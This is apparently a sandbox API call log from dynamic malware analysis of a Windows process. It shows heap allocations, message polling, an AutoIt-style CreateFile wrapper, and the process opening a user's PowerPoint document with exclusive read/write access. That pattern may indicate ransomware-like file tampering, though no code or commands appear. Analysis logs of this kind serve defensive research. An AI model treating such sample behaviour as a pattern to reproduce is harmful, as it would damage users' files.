0 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0171.610] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0171.610] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0171.610] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0171.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0171.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.611] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.612] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.613] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0171.613] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0171.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.614] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0171.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd930 [0171.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd930, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0171.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kuxyygupccske_knyra.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0171.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0171.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0171.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0171.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0171.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0171.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.618] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0171.619] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.620] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0171.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0171.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0171.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | 